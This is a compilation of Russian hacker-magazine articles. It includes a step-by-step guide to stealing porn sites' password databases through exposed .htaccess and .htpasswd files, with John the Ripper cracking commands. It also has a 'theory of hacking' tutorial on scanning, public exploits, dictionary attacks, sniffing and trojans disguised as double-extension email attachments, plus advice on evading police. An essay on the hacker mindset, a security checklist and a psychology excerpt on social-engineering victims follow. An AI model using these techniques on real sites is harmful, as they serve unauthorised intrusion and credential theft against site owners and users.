перл, заняла примерно столько же времени. Но это на 666-ом пароле, а на 1000000-ом я бы ждал очень долго. Поэтому этот способ обладает очень призрачными шансами что-либо подобрать и годится только для очень простых паролей. P.S. Статья и программа предоставлена в целях обучения и вся ответственность за использование ложится на твои хилые плечи.
-
Сегодня мы будем иметь (в хорошем смысле) порно сайты! Тебе наверное надоело лазить по бесплатным порно-сайтам, заходя на которые, открываются ещё 50 окошек . Ну ладно будем добывать базу паролей порно-сайта. Чем не мечта для халявщика, коим ты и являешься? Вобще этот спорсоб катит с любым сайтом, но ведь порносайты наиболее неустойчивы к взломам, ты только представь себе админа порносайта =). Только предупреждение: за возможные траблы по поводу твоего взлома я никакой ответственности, естественно, не несу. Приступим же, наконец, к трепанации adult-ресурсов =). Описание процесса У каждого порносайта есть несколько зон. Нет, не эрогенных, как ты может подумал, а просто зон =). Ты, наверное, видел при заходе на какой-либо такой сайт менюшки типа Free Tour, Register и For Members. Первая нам нахрен не нужна, хотя, если хочешь получить общее представление о тематике фоток и вообще порно-сайта, можешь быстренько пробежаться и по ней. Вторая менюшка, Register, имхо предназначена либо для толстых озабоченных онанистов =), либо для ламаков, у которых руки не из того места растут. Так как к нам это, естественно, не относится, то выбираем последний пункт - For Members (для членов, хехе =) Тут ты, введя пароль и логин для входа, попадёшь на сайт. Принцип действия таков: введя пароль с логином, ты оправляешь форму, где она сравнивается со списком паролей зарегистрированных онанистов и в случае полного соответствия пропускает тебя внутрь. Ни пароля, ни логина ты, конечно, пока не знаешь. Вот мы и займемся тем, как бы их свистнуть =). На некоторых порносайтах (но не всех!) до сих пор есть такая рульная для нас фишка, как баг .htaccess Этот файл содержит множество инфы - от списка локализации различных ресурсов до, в некоторых случаях, паролей. А последние нам как раз нужны! В большинстве своём .htaccess является сортировщиком в отношении доступа к дирам и, есесно, к файлам. С его помощью мы можем просмотреть скрытые или запрещённые диры через броузер. Для получения доступа к файлу в URL'е хакер знает какой длины, нам будет достаточно ввести основной адрес хоста, слэш ( \ ), нэйм самого файла или диру, еще раз слэш, и в конце .htaccess Доступ обеспечен. Принцип порно-сайтовской системы достаточно прост, главное пораскинь мозгами. Ты можешь изучить структуру каталогов и, чуть попарившись, вывести passwordlist, но для этого нужно быть знакомым с атакуемой системой. Ты должен знать, как там построены директории, какой в них лежит принцип. Потому как если неверно задашь диру - ничего не получится соответственно =(. Но можно поступить проще - Хакер опять приходит тебе на помощь! =) Просто сходи на http://ultrapasswords.com/. Зашел? Ну что же, отлично. На этом кульном сайте ты сможешь найти сотни пассов для различных буржуйских порно-сайтов. Только не кидайся сломя голову на первый попавшийся сайт, со счастливым видом вводя увиденный там пароль. Мы же делом заняты! =) Итак, возьми на обозначенном серваке пароль к тому сайту, который хочешь хакнуть. Даже если не нашел (что вряд ли), то возьми пасс для другого сайта: мы же должны что-то взломать! =) Затем, с полученный логином и паролем войди в зону для членов ака Member Zone. Теперь ты внутри! =) Обрати сейчас внимание на урл, он может иметь примерно такой вид: http://www.pornosite_name.com/members/index.html, или на конце может быть default.html, но это не важно. Важно другое: вместо index.html вставь заветное .htaccess Тогда строка адреса примет такой вид: http://www.pornosite_name.com/members/.htaccess Теперь, если тебе повезет, ты должен увидеть примерно следующее: AuthUserFile /www/pornosite_name/members/.htpasswd именно нужное нам место, где лежит файл с паролями (может быть и другая структура директорий, я взял эту лишь для примера). AuthGroupFile /dev/null здесь находится groupfile AuthName Members Only Directory помнишь то окошко, которое требует ввести логин/пасс? Вот оно-то и лежит по этому адресу =). Кроме этого здесь, возможно, будет и другая инфа, которая нам не и нужна. В итоге теперь ты знаешь, где находится нужный нам файл с паролями. Он так и называется passwordfile. Ты, наверное, уже ручки от удовольствия потираешь, но обломись: пароли все зашифрованы. Например: suporgazm:71aLc8qpWPzd, где suporgazm-логин, а 71aLc8qpWPzd-зашифрованный пароль. Но спешу тебя утешить: это поправимо =). Просто берешь и с родимого http://astalavista.box.sk/ скачиваешь известную тебе прогу "John the Ripper". Все найденные пароли сохраняешь в текстовый файл и притом не где попало, а в ту диру, куда ты заинсталлил "Джона". Теперь, чтобы расшифровать пароли, заюзай следующие команды: John xxx.txt -single (Самый быстрый способ, и в то же время самый простой алгоритм) John xxx.txt -wordfile:password.lst (Это посложней, можно сказать, самый средний по всем параметрам метод) John xxx.txt -incremental (Это самый сложный алгоритм и занимает время, но он и самый надежный) Выбирай нужную и действуй! В итоге, ты имеешь всю базу паролей желанного порносайта, к чему, собственно, мы и стремились. Вот и все! Видишь, как все просто? А ты-то думал… =) Таким образом можно поиметь и множество других сайтов, используя баг файла .htaccess. Но делай это как можно осторожней: не мне тебя учить этому, хацкер. Чтобы снизить вероятность траблов на свою задницу, всегда используй прокси, взятые, например, со http://spylog.ru/. Удачи тебе, хацкер!
-
Постоянно слышу вопрос, ни разу не видел хорошего ответа. Как-то даже видел книгу с таким названием. В ее первой главе автор на полном серьезе советовал почувствовать себя дерьмом, чтобы преисполниться нужных эмоций и настроиться на взлом. Что ж, удачи тем, кому этот способ понравился, а у меня другое видение проблемы. Рискну высказать. Хакер – человек, способный выжать все возможное из того, что у него в распоряжении. Поэтому, имея такой же доступ к системе, что и обычный человек, он иногда способен ее взломать (именно «иногда», бывают случаи, когда систему нельзя взломать в принципе). Вот и все, что отличает хакера от простого смертного. Соответственно инструкция по апгрейду от простого смертного до хакера проста - измените себя так, чтобы выделенные высказывания относительно вас были справедливы... Способность получить все, что теоретически возможно получить, дается доскональным знанием системы и особым складом ума, не пропускающим никакие варианты, особенно нетривиальные. Обо всех составляющих по порядку. Доскональное знание системы – это понимание того, как система работает. Для понимания работы программы идеально подходят исходники в сочетании с умением их читать, то есть понимать алгоритм по тексту программы. Опытные хакеры способны понимать программу, написанную на языке, который они никогда в жизни не видели. Не всегда исходники доступны, тогда может пригодиться знание ассемблера и отладчиков, которое позволяет понимать алгоритм любой программы, находящейся на подконтрольном компьютере. Это тяжелее. В самом тяжелом (и самом частом) случае, когда программа находится на удаленном компьютере, и хакер ничего о ней не знает, приходится лишь догадываться, как она устроена. Тут требуется опыт анализа и написания аналогичных программ и программ вообще. Короче говоря, хакеру совсем не помешает быть опытным программистом. У серверных программ есть еще одна особенность – полезно знать протокол, по которому она работает. Протокол – набор правил, по которому общаются стороны (программы, компьютера, системы). Он нужен для того, чтобы стороны могли понимать друг друга. Большинство протоколов хорошо описаны авторами, лишь изредка приходится сталкиваться с недокументированными протоколами и догадываться, что они из себя представляют. Описания большинства протоколов есть на сайтах RFC, вот один из них: http://the.rfceditor.org/ У протоколов могут быть слабые места - проблема, которую автор программы не может исправить – он просто выбрал не тот протокол, возможно, он сам не знает его слабых мест. А вот вам их знать надо. Бывает, что программист допускает отклонения от реализации протокола. Чтобы найти их, просто попробуйте сказать другой стороне не то, что она ждет, и увидите, чем это кончится. Идеально написанная программа должна ответить «ошибка протокола», но при неправильной реализации может произойти нечто, чего не предусмотрел создатель, и что окажется полезно хакеру. Полезно знать об ошибках, допускаемых разработчиками, и о методах их использования (exploit). Детальная информация о них излагается в так называемых security advisory, которые можно встретить на сайтах серьезных групп, занимающихся проблемами безопасности. Всемирная база данных advisory есть на www.securityfocus.com, полезно почитать. Это все, что касается знаний. Теперь - о мозгах. Мозги не должны быть застарелыми, иначе дальше использования известных дырок и средств автоматизированного взлома «хакер» не пойдет. Для тестирования застарелости мозгов предлагаю такую шуточную задачку про обкуренную ласточку . Требуемый уровень знаний – 5 класс, однако, чем человек старше, тем сложнее ее решить… Поезд едет из А в Б. Расстояние – 120 км. Скорость поезда – 40 км/час. Навстречу поезду из Б вылетает ласточка со скоростью 60 км/час, долетает до поезда, разворачивается и летит обратно в Б, разворачивается, летит к поезду… Так до тех пор, пока оба они не прибудут в Б. Вопрос: какое расстояние пролетела ласточка? Второе требование – любовь к brainfucking’у. Переводить слово целиком не буду, скажу только, что brain – «мозги». Так вот, хакер обязан любить brainfucking, иначе не сможет заниматься исследованиями, без которых он – жалкая, ничтожная личность, паразитирующая на чужих достижениях . Последнее требование, о котором я скажу, скорее психологическое. Хакеру предстоит устоять перед славой, не «спопситься», ведь понтоваться перед толпой на порядок проще, чем заниматься серьезными исследованиями. Если он не устоит, то станет просто клоуном, работающим на потеху зрителям, и на этом его развитие остановится. Если после прочтения текста вы все еще не передумали становиться хакером - вперед! Удачи.
-
Сегодня тебе предстоит познакомиться с теорией взлома. Вобще самый лучший админ - это хакер. Точно так же можно сказать, что самый лучший хакер - это злой админ . Этот текст представлен прежде всего как руководство по защите твоей системы. И помни про существование закона, в котором предусмотрены не хилые наказания за информационный вандализм! Приступим: Допустим, что у тебя есть какой-то сервер, который ты хочешь взломать или протестировать на защищенность от взлома. С чего нужно начинать? Что сделать в первую очередь? Сразу очень много вопросов и ни одного ответа. Четкой последовательности действий нет. Взлом - это творческий процесс, а значит, и подходить к нему приходиться творчески. Нет определенных правил и нельзя все подвести под один шаблон. Зато есть несколько рекомендаций, которых желательно придерживаться. Самое первое, с чего начинается взлом или тест системы на дырявость - сканирование портов. Для чего? А для того, чтобы узнать, какие сервисы/демоны установлены в системе. Каждый открытый порт - это сервисная программа установленная на сервере, к которой можно подключиться и выполнить определенные действия. Например, на 21-м порту висит FTP сервис. Если ты сможешь к нему подключиться, то тебе станет доступной возможность скачивания и закачивания на сервер файлов. Но это только если ты будешь обладать соответствующими правами. Первое, что нужно просканировать - первые 1024 порта. Среди них очень много стандартных сервисов типа FTP, HTTP, Telnet и т.д. Все открытие порты - это дверь с замочком для входа на сервер. Чем больше таких дверей, тем больше вероятность, что какой-то замок не выдержит натиска и откроется.У хорошего админа открыты только самые необходимые порты. Например, если это WEB-сервер не предоставляющий доступ к почте, то нет смысла держать сервисы почтовых серверов. Хороший сканер портов не только говорит номер открытого порта, но и показывает название установленного на нем сервиса. Желательно, чтобы сканер умел сохранять результат своей работы в каком-нибудь файле. Если этой возможности нет, то придется переписать все вручную и положить на видное место. В дальнейшем тебе пригодиться каждая строчка твоих записей. После этого можешь сканировать порты свыше 1024. Здесь стандартные сервисы встречаются редко. Зачем же тогда сканировать? А вдруг кто-то до тебя уже побывал здесь и оставил открытую дверку или протроянил сервак. Большинство троянов держат открытыми порты свыше 1024, поэтому если ты админ и нашел открытый порт с номером больше 1024, необходимо сразу насторожиться. Ну а если ты взломщик, то необходимо узнать имя трояна и найти для него клиентскую часть. На этом взлом может закончиться, потому что ты уже получил полный доступ к серваку без особых усилий . Определяем ОС: Теперь мы знаем, какие двери у сервера открыты и чем мы можем воспользоваться. Но этого мало, потому что мы знаем какие есть двери, но не знаем, как их открыть. Сканирование - это всего лишь самый начальный этап, который тебе еще ничего особенного не сказал. Самое главное перед взломом - определить, какая ОС стоит на серваке. Желательно знать и версию, но это удается не всегда, да и на первых парах изучения системы можно обойтись без конкретизации. Для определения версии я могу посоветовать Shadow Scan. Не могу сказать, что она лучшая, но и к разряду худших отнести ее не имею права. Помимо определения ОС, прога умеет определять версии установленных сервисов. Это тебе может очень сильно помочь. Допустим, что ты узнал, что на серваке установлен WEB-сервер. Ты даже узнал, что ОС именует себя как "Окошки". Ты можешь предположить, что WEB-сервер именует себя как IIS, но это предположение может тебя обмануть. Для окошек есть реализация сильнейшего сервера Apache. А так как взлом разных серверов производиться по разному, то тебя должно в первую очередь волновать, кто именно сидит на 80-м порту - IIS или Apache. Единственный недостаток Shadow Scan - именно при определении версии ОС некоторые релизы Shadow Scan вылетали в синий экран. Но в последней версии этот баг вроде исправлен.Адрес этой распрекрасной тулзы ты можешь найти во врезке "Download". Юзаем порты : Итак, теперь ты знаешь, какая на сервере установлена ОС, какие порты открыты, и какие именно серверы висят на этих портах. Вся эта инфа должна быть у тебя записана в удобном для восприятия виде, хоть в файле, хоть на бумаге. Не ленись всю собранную инфу записывать и собирать в одну кучу. Помни, что даже компьютерные мозги иногда дают сбои, а человеческие делают это регулярно. Самое интересное, что чаще всего забывается самое необходимое. Ну а после взлома не поленись уничтожить, иначе ты облегчишь работу нашей доблестной милиции. Все записал? Ну, на этом можно остановить взлом. У тебя есть достаточно инфы для простейшего взлома по уже пройденным другими хаксорами следам. Просто посещай регулярно www.securityfocus.com. Здесь ты должен поискать информацию о дырявости установленных на серванте жертвы сервисов и самой ОС. Уже давно известно, что большая часть серверов (по некоторым данным 70%, а по некоторым 90%) в инете просто не латаются. Поэтому проверь все найденные эксплоиты на жертве, возможно, что-то подойдет. Если сервер хорошо залатан, то придется ждать появления новых дыр и експлоитов к установленным на сервере сервисам. Как только увидишь что-нибудь интересное, сразу качай експлоит и юзай свежую дырку, пока админ ее не залатал. Тестирование безопасности : Практически каждый день специалисты по безопасности находят в разных системах недочеты и откровенно говоря дыры или даже пробоины в системе безопасности. Все эти пробоины выкладываются в отчетах BugTraq на разных серверах. Я тебе уже посоветовал посещать www.securityfocus.com, чтобы следить за новостями, и сейчас не отказываюсь от своих слов. Новинки действительно надо смотреть на этом сервере, но ведь есть еще ворох старых дыр, которые могли быть, и не залатаны на сервере. Как же поступить с ними? Не ужели придется качать все эксплоиты и ручками проверять каждую пробоину? Ну конечно же нет. Существует громадное количество прог для автоматизации тестирования сервера на залатанность. Ты думаешь я должен посоветовать тебе какую-нибудь определенную прогу? Нет, я этого делать не буду, потому что все программы хороши. Не существует такой тулзы, в которой была бы база абсолютно всех потенциальных дыр. Поэтому качай все, что попадется под руку. Возможно что-то тебе и пригодиться. Взлом WWW-серванта : При взломе WWW-серванта есть свои особенности. Если на сервере крутятся CGI страницы, то взлом такого серванта нужно начинать совершенно по-другому. Для начала нужно просканировать его на наличие дырявых CGI скриптов. Ты не поверишь, но опять же по исследованиям крутых дядек, в инете громадное количество скриптов дырявые. Дырявость скриптов связана с тем, что для кодинга страничек используется Perl. Я ничего не имею против этого языка, но он сейчас достиг уровня универсала. На нем можно делать практически все, а не только форматировать текст. Поэтому в Perl очень много потенциально опасных функций. Но это не так страшно. Страшнее, когда ты можешь этим функциям передавать свои данные, когда скрипты не проверяют введенную пользователем инфу, а в чистом виде передают параметры в опасные функции. Другие языки (PHP, ASP и др) тоже имеют потенциально опасные функции, просто там их или поменьше, или они имеют дополнительную защиту. Единственный более менее защищенный язык - Java, который очень сильно тормозит систему, из-за чего его не охотно используют WEB-мастера. Я не собираюсь тебя лечить карявостью языков кодинга, потому что главная корявость - руки программера. Из-за громадной нехватки спецов в нашей любимой области, кодингом стали заниматься все кому не лень. Многие программеры самоучки даже не пытаются задуматься о безопасности. А тебе это только на руку. И так, твоя главная задача - запастись парочкой хороших CGI-сканеров. Какой лучше? Ответ однозначный - ВСЕ. Даже в самом плохом сканере может оказаться инфа о такой уязвимости, о которой не известно даже самому крутому. А главное, что по закону подлости именно эта уязвимость окажется доступной на серваке. Я советую тебе скачать побольше сканеров, поищи в иНете =). Серп и молот : Там где не возможно взломать сервер с помощью мозгов, всегда можно воспользоваться чисто русским методом - серпом и молотом. Это не значит, что серп нужно представлять к горлу админа, а молотком стучать по макушке. Просто всегда можно воспользоваться тупым подбором паролей. Давай снова обратимся к статистике. Все исследовательские конторы пришли к одному и тому же выводу, что большинство ушастых выбирают в качестве пароля имена своих любимых собачек, кошечек, даты рождения или номера телефонов. Так что хорошо подобранный словарь может сломать практически любую систему, потому что везде есть ламеры. Ты до сих пор еще не веришь мне? Давай вспомним знаменитейший червь Морриса, который проникал в систему, взламывая ее по словарю. Словарь был достаточно маленький и состоял менее чем из ста слов. Помимо этого, червь использовал в переборе слова из словаря установленного в системе. Там тоже слов не так уж много. И вот благодаря такому примитивному алгоритму, червь смог поразить громаднейшее число компов и серваков. Это был один из самых массовых взломов!!! Взлом по словарю очень часто используется для взлома мыльников, FTP паролей и другой чешуи. Но прежде чем приступать к такому взлому, советую хорошо отредактировать словари имен и паролей. Очень важно знать, какую систему ты взламываешь. Например, если это оконный сервер, то желательно, чтобы среди логинов был "Администратор". Ну а если это *nix система, то обязательно должен присутствовать "root", а все логины типа "Администратор" можно послать куда подальше. Неплохо было бы вставить в словарь любые имена и пароли используемые по умолчанию для разных сервисов. Очень часто админы забывают или просто ленятся поменять пароли на сервисы, которые запущены, но они ими не пользуются. Эта лень очень часто проявляется у админов окошек и это связано с тем, что в окошках уровень знаний спецов намного ниже. Например, я очень много встречал MS SQL Server 7.0 c логином по умолчанию в "sa" и абсолютно без пароля. Наверно поэтому M$ собирается убрать этот логин уже в следующей версии своего сервера баз данных. Для тупого перебора я опять могу посоветовать Shadow Scan (ну люблю я эту тулзу, что тут поделаешь). В нем есть очень хороший генератор словарей и реализованы подборщики по всем основным протоколам. Взлом локалки : В локалке есть свои особенности. Например, если она построена на основе коаксиала или витой пары соединенной через хабы, то весь сетевой трафик обязательно проходит через твою машину. Почему же ты его не видишь? Просто ОС и сетевуха сговорились и не показывает тебе чужой трафик. Но если очень сильно захотеть, то можно воспользовавшись снифером пронюхать все данные проходящие мимо твоей сетевой карточки. Сейчас в сети можно скачать громадное количество сниферов и примочек к ним. Я опять не буду советовать тебе что-то конкретное, потому что лично я не могу выделить однозначного лидера среди сниферов. Разные версии заточены под разные нужды, и тут нужно выбирать именно из этого соображения. Если ты конкретно ищешь пароли, то тебе нужен тот, что умеет выделять информацию о регистрации из общего трафика сети. Троянус : Самый тупой и самый ненадежный в отношении админов способ. Хотя админы и бывают ламерами, но на такие шутки уже никто не катит. Но кто сказал, что в сетке существуют только админы? Есть еще куча ламеров с большими привилегиями и маленькими мозгами. Вот именно их и надо троянить. Как забрасывать троян? Самый распространенный способ - почтовый ящик. Просто даешь трояну какое-нибудь заманчивое имя и отправляешь письмо жертве. Если он запустит твой трой, то считай, что ты царь и бог на его компе. Теперь тебе будет доступно все, что может для тебя сделать твой боевой конь. Какое дать имя, чтобы заинтересовать ламера? Очень просто, окна очень часто прячут расширения всех зарегистрированных в системе типов файлов. В этом случае, если ты назовешь файл как Anna_Kurnikova.jpg.exe, окна спрячут последнее расширение и любой лам подумает, что видит картинку. Для большей надежности, файл лучше всего назвать даже так: Anna_Kurnikova.jpg...........exe. В этом случае, если даже расширение не прячется по умолчанию, его все равно видно не будет Любое письмо с трояном желательно снабдить хорошим текстом, чтобы заинтересовать чела запустить находящийся в нем файл. Итог : Эта статья не претендует на полноту, но я постарался дать все необходимые начальные сведения. Просто нас очень часто упрекают, что мы забываем про начинающих, и очень часто грузят вопросами типа: "Как взломать сервант?". Теперь ты сможешь залезть в танк и катиться дальше вместе с нами. Я заведомо не затрагивал тему получения халявного инета, потому что тут очень много своих особенностей. Но один из возможных способов я все же описал - трояны. Вообще, этот способ практически универсальный и может использоваться везде. Я так же надеюсь, что продвинутые челы тоже смогли найти для себя нечто интересное или новое. Покедова, надеюсь еще увидимся. Дополнительная инфа : http://www.cert.ru/ - хороший сервант по известным дырам. Радует, что он на русском, а огорчает редкость обновления и не все дыры описываются. http://www.cert.org - то же самое, что и предыдущее, только на английском языке. http://www.securityfocus.com - это я тебе уже рекомендовал, поэтому просто напоминаю. http:/www.void.ru -отличный сервант на русском языке. Можешь сделать его стартовой страницей. Не верь глазам своим!: Сейчас мы поговорим о том, как различные проги определяет семейство ОС установленной на серваке. Для этого есть несколько способов: 1. По реализации протокола TCP/IP. Разные корпорашки по разному реализуют стек протоколов в своих ОС. Программа просто анализирует ответы на запросы от сервера и делает вывод об установленной ОС. В основном этот вывод расплывчатый типа Windows или Linux. Точную версию таким образом сказать невозможно. Допустим, что прога сказала, что на серваке установлен Linux, но какой именно дистрибутив тебе никто не скажет. А ведь дыры в разных дистрибутивах разные и поэтому такая инфа - это только половина необходимого тебе для взлома сервера. 2. По ответам разных сервисов. Допустим, что на сервере жертвы есть анонимный доступ по FTP. Тебе нужно всего лишь присоединиться к нему и посмотреть сообщение приглашения в систему. По умолчанию, в качестве приглашения используется надпись типа "Добро пожаловать на сервер FreeBSD4.0 версия FTP клиента Х.ХХХ". Если ты такое увидел, то можно и радоваться и плакать, потому что это может быть и правдой.Если надпись приглашения отражает действительность, то админ - лох со стажем. Нормальный админ всегда изменяет приглашение по умолчанию. А вот хороший админ может написать и ложное сообщение. Например, на сервере с Windows 4.0 можно увидеть приглашение в Linux. В этом случае можно безуспешно потратить очень много времени в попытках сломать окна через дыры Linux. Поэтому не особо доверяй надписям и старайся перепроверить любыми другими способами. 3. Социальная инженерия. Если ты хочешь взломать сервант хостинговой компании, то можно отправить письмо админу с запросом об установленных у него серверах. В основном админы или служба поддержки не скрывают эту инфу, но бывают случаи и вранья. Возможно, что эта инфа будет лежать даже на главной странице сервера, но даже это следует проверить. Чтобы тебя не надули, обязательно обращай внимания на используемые на сервере сервисы, например, в Linux врят ли будут крутиться страницы созданные по технологии ASP. Hack-Download : В этой врезке я постараюсь дать тебе список всех программ, которые тебе понадобятся при тестировании системы на дырявость. CyD NET Utils - всегда можно скачать с сайта www.cydsoft.com/vr-online. эта программа писалась не для взлома а для тестирования локальных сетей на работоспособность и безопасность. Так что если ты админ, то желательно иметь эту прогу в своем арсенале. В CyD NET Utils присутствует удобный сканер портов, пингер, WhoIs и многое другое. Результат работы можно всегда можно сохранить файл или распечатать. Shadow Scan - отличная прога с большим количеством возможностей для тестирования системы на вшивость. Что-то говорит мне, что написана нашими братьями по разуму из ближней Украины. NT Crack - прога проверки NT на вшивость. Если ты хочешь взломать оконный сервер, то эта прога должна быть в твоем арсенале. Ну а если хочешь защитить NT, то тем более. NT Bugs - достаточно приличного размера описание багов оконного сервера. Если ты владеешь буржуйским языком, то просто обязан иметь ее в своем арсенале. LC4 - самый знаменитый и крутейший подборщик паролей для NT. Retina Network Security Scanner (http://www.eeye.com/) - хороший сканер безопасности. Вот не знаю я, и за что я в него такой влюбленный ? Короткий словарик : Демон - серверная программа, которая работает в фоне и предназначена для выполнения каких-либо действий. Этот термин применяется в *nix средах. Там названия таких прог в основном отличаются тем, что в конце имени стоит буква "d". Представим себе демон WEB сервера. Это должна быть прога, которая висит в памяти и ждет подключения на 80-й порт (это по умолчанию). Как только кто-то подсоединился, демон начинает принимать запросы и отвечать на них. Но демоны бывают не только сетевые, потому к сетевым, например, невозможно отнести демон печати. Сервисы - это то же самое, что и демоны, только так называют те же проги в окошках. Експлоит - прога, которая умеет пользоваться какой-нибудь уязвимостью сервака. Если он написан под *nix, то может поставляться в исходных кодах. В этом случае, перед использованием потребуеться компиляция. Порт - Каждая сетевая программа при старте открывает для себя любой свободный порт. Есть и зарезервированные типа FTP это 21-й порт, HTTP это 80 порт и т. д. Теперь представим ситуацию, что на сервере запущено два сервиса: FTP и WEB. Это значит, что на сервере работает две программы, к которым можно коннектиться. Теперь ты хочешь присоединиться к FTP серверу и посылаешь запрос по адресу ХХХ.ХХХ.ХХХ.ХХХ и на порт 21. Сервер получает такой запрос и по номеру порта определяет, что твой запрос относиться именно к FTP серверу, а не WEB. Так что сетевые порты - это что-то виртуальное, что увидеть невозможно. Если бы не было портов, то комп не смог бы определить для кого именно пришел твой запрос. Троян - прога, которая незаметно сидит в системе жертвы и позволяет тебе управлять его компом.
-
1. Запретите или сделайте невозможным то,что не разрешено явным образом. 2. Всегда устанавливайте пароль,сделайте его сложным и часто меняйте(если есть что скрывать). 3. Следите за обновлениями используемого программного обеспечения. 4. Для всех типов доступа предоставляйте лишь необходимый минимум привелегиий(чем меньше тем лучше). 5. Ограничьте доверие. 6. Относитесь ко всем внешним интерфейсам с особой "параноей" (в том числе и к телефонным подключениям!). 7. Должны быть включены системы мониторинга, ведение журнала и аудита. 8. Обеспечьте возможность реагирования на проишествия,непрерывность работы. 9. Помните технология не защитит ВАС от СОЦИАЛЬНЫХ атак (Поменьше трепись о личном). 10.И вообще разработайте политику безопасности, сделайте ее полной и широко распределённой. 11. Определяйте реальный риск вторжения. 12. Изучите свои платформы и программы лучше врага. Прежде чем атаковать нужно научитья обороняться!
-
Попал в чужую колею, глубокую… В. Высоцкий На первый взгляд, этот раздел данной главы никакого отношения к социальному программированию и социальной инженерии не имеет. Однако мы включили в настоящую книгу этот раздел хотя бы по одной причине: чтобы читатель смог получше разобраться в людях, и в отношениях между ними. И, самое главное, в глубинных причинах этих отношений. Почему у одних все хорошо, а у других все плохо? Хотя, казалось бы, стартовые условия одинаковые. Почему один куда бы не устроился — у него все хорошо на работе, а у другого — все плохо? Почему к одному подошли социальные хакеры, неважно кто, хоть цыганки те же, и он им рассказал все, что знал и отдал, все что имел. А к другому пять раз подходили — а ему "как с гуся вода", знай только себе посмеивается и приглашает шестой раз попробовать. В данном разделе мы постараемся дать ответ на эти вопросы. …Иной раз кажется, что какому-то человеку на роду написано быть неудачником, а другому наоборот — счастливчиком. И это правильная фраза. Действительно, многим из нас "написано на роду". Дорогой читатель, успокойтесь… Авторы — не мистики и не фаталисты. Мы лишь просто немного знакомы с психологией. И знаем, кто пишет нам те скрипты, по которым многие из нас действуют всю жизнь. И постараемся рассказать вам об этом в данном разделе. Ясно, что атакам социальных хакеров, как правило, подвержены люди, скажем так, с точки зрения психологии не вполне полноценные. Проблемные люди, т. е. те, у кого слишком много нерешенных проблем, комплексов… Эти люди живут не по своей воле, хотя им кажется, что по своей. Они всегда выполняют чью-то чужую волю, они в "чужой колее"… …Их видно в толпе: идут, погрузившись в свои мысли, отсутствующий взгляд, неуверенная походка. Потенциальные же жертвы социальных хакеров, мошенников и преступников всех мастей. Ввести в транс такого человека не составит труда. А вот и другие — бодрая походка, трезвый взгляд, могут оценивать ситуацию. Это счастливчики, любимцы жизни. Кто же и когда пишет нам скрипты, по которым мы живем? Современная психология знает, что у человека есть подсознательный жизненный план, согласно которому он живет. Этот самый план и называется скриптом. Термин этот введен Э. Берном, основателем скриптового анализа. Скрипт (или сценарий, как его еще иногда называют) в психологии, как правило, употребляется в отрицательном смысле. Таким образом, если человек неудачник, значит, он живет в рамках какого-то сценария или скрипта. Неудачного, безусловно. Конечно, бывают и хорошие скрипты. Но психологи, имея дело в основном с плохими скриптами (счастливые люди к психологам не обращаются), употребляют слово скрипт, как правило, в отрицательном смысле. Вкладывая в это понятие то, что человек "со скриптом" уже не хозяин своей жизни, его плачевный итог уже предрешен много ранее и, чтобы он не делал, вырваться из скрипта он не сможет. Говоря языком театралов, трагический итог пьесы предрешен, у человека есть возможность лишь слегка изменить действие по ходу пьесы, но каким путем он бы не пошел, это все равно приведет его к уже известному итогу. …Берем нескольких людей и копаем яму. Неглубокую. После этого случайно взятому человеку завязываем глаза и отводим на некоторое расстояние от ямы (по прямой). Говорим, чтоб шел вперед. К яме. Суть в том, что нужно с завязанными глазами в эту яму не провалиться: остановиться сразу перед ней. А теперь смотрим, что получается. Первый пошел. Два шага сделал резво, а потом до самой ямы плелся, что твоя черепаха Тортилла. Но не упал. Подошел к самому краю, сделал шаг вперед, и почувствовал, что дальше хода нет. Второй пошел. Бегом бежит! И — ооп-па! — касается одной ногой самого края ямы и ее перепрыгивает! Да… За этого можно не беспокоиться, у него в жизни получится все и даже больше. Третий — идет ровно, спокойно, но прямо у самого края встал, подумал и дальше не пошел. С этим тоже дальше все будет нормально. А вот четвертый… Четвертый шел бодро, уверенно, с улыбкой, и упал в яму. Этого можно подозревать на наличие отрицательного скрипта. Второй раз, третий, четвертый, пятый — и все время падает. Все, почти точно — это виктим (victim) (жертва). Если виктим стопроцентный, так скажем, то можно наблюдать почти мистические вещи. Можно отвести его в сторону от ямы и сказать, чтобы ничего не боялся и шел прямо. Потому что яма в стороне и ничего ему не грозит. Ба! А прямо-то ему не идется, яма эта притягивает его как магнитом, и вот он заворачивает, заворачивает, и… И снова падает в яму. Хотя, казалось бы, шанс попасть в нее в данном случае ничтожный. И однако… В жизни этот человек будет делать примерно то же самое: из тысячи возможных решений он выберет самое неудачное. А на все удачные моменты жизни, которые ему подсказывает судьба, он будет "плевать с высокой колокольни", и попросту не замечать их. Дожидаясь того единственного момента, который самый плохой. Дожидаясь этой своей ямы… Но кроме четвертого есть еще и пятый. Мистика, но если отвести его вбок от ямы, то он все равно приходит к ней! Тест этот проводить вам совершенно необязательно, просто на его примере мы попытались лишний раз объяснить, кто такие жертвы, или виктимы, как мы условились их называть. Вот и в жизни такие люди делают то же самое. Это люди со скриптами, они не вольны распоряжаться своей жизнью… Самое интересное в нашей жизни то, что какой она будет мы решаем очень рано — в возрасте от 3 до 6 лет. Некоторые, особо одаренные, еще раньше — в период внутриутробного развития. Э. Берн говорил на эту тему примерно так: "Каждый человек в раннем детстве решает, как он будет жить в жизни, как он умрет, и этот план, который всегда с ним, где бы он ни был, и называется скриптом или сценарием.Его поведение может быть обусловлено здравым смыслом, но все важнейшие решения в его жизни уже приняты: кого он выберет в супруги, сколько будет детей и будут ли они вообще и т. д.". Скрипт — это жизненный план, сформированный в раннем детстве под влиянием родителей. Вот вам и ответ на вопрос, кто пишет нам скрипты. Родители, конечно, кто же еще… Скрипт — это та психологическая сила, которая толкает человека к его судьбе. Прочитав эти строки, читатель может подумать, что авторы ударились в глубокую философию, и, наконец, ответили на вопрос, давно мучавший все человечество: "Что наша жизнь — предрешенная кем-то судьба или мы сами строители своей жизни?" А заодно и вывели формулу жизни, по которой мы все живем. Увы, не так. Увы, потому что это сделали не авторы, а великие психологи и психотерапевты. И основателем этого направления в психологии является уже много раз упоминавшийся нами Э. Берн, а также Э. Карпмпан, М. Литвак — эти психологи много потрудились на ниве сценарного программирования. Они же и ответили на вопрос, что нужно сделать для того, чтобы самим стать строителями своей жизни, даже если до этого мы живем по написанному кем-то скрипту. Это направление в психологии называется сценарное или скриптовое перепрограммирование. Ответили они и на вопрос, кто пишет нам скрипты. Родители, как мы уже выяснили. Человеческую жизнь не нужно сводить к формулам, и все психологи в один голос твердят о том, что нормальная жизнь — это жизнь не по формуле. Нормальная жизнь — это когда человек сам хозяин своей судьбы, когда он живет разумно строя свою жизнь, с учетом действий внешних обстоятельств и жизни других людей. Однако большинство людей, увы, живут 